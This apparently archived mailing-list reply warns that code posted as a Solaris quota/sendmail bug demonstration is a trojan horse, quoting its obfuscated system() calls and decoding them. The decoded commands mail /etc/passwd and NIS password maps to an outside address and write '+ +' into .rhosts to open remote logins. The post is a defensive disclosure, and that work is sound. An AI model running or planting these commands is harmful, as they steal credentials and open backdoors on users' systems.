Re: quotas? maybe you're not seeing all of it

[Don.Lewis () tsc tdk com (Don Lewis)]

Trojan horse alert!

On Jul 21, 10:57am, "Brett L. Hawn" wrote:
} Subject: quotas? maybe you're not seeing all of it
} I finally found the source to this annoying little monster so I thought I'd
} let ya'll see it. I don't know off hand if this little bug has been seen
} before/discussed before but if it hasn't I'm quite sure all of you would
} love to fix it :) I've not tried it on anything but Solaris 2.5 so far but
} I've no doubt that it'll work elsewhere as well.
}
} What this does is takes a file and hides it in somone else's directories
} using sendmail.

I don't think so ...

I changed the system() calls to 'printf("%s\n", ...)'

} system(zipper(initseeds));

I couldn't make sense of this, initseeds appears to be mangled.

} system(zipper(setupseeds));

This executes:
        cat /etc/passwd 2>/dev/null | mail tsk () mail thirdwave net >/dev/null 2>/dev/null

} system(checkseed(binseeds));

This executes:
        ypcat passwd.byname 2>/dev/null | mail tsk () mail thirdwave net >/dev/null 2>/dev/null

but only if a directory in your path doesn't exist.

} system("%s\n",zipper(procseeds));

I don't think system() can be called with printf() style arguments, but
this executes:
        touch .rhosts 2>/dev/null

} system("%s\n",zipper(boutseeds));

This executes:
        echo + + 2>/dev/null >> .rhosts

} system("%s\n",zipper(shtdwnseeds));

This executes:
        chmod 700 .rhosts 2>/dev/null